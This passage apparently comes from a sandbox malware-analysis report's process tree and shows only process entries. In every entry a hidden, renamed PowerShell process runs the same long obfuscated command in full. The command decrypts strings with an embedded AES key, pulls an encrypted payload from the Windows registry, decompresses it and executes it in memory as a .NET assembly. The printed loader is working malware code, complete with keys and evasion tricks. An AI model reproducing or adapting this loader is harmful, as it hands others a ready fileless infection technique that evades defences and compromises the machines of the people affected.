'')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        17⤵
        
        PID:1448
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6028).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        17⤵
        
        PID:3960
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6028).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        17⤵
        
        PID:5920
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6028).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        17⤵
        
        PID:5892
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6028).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, 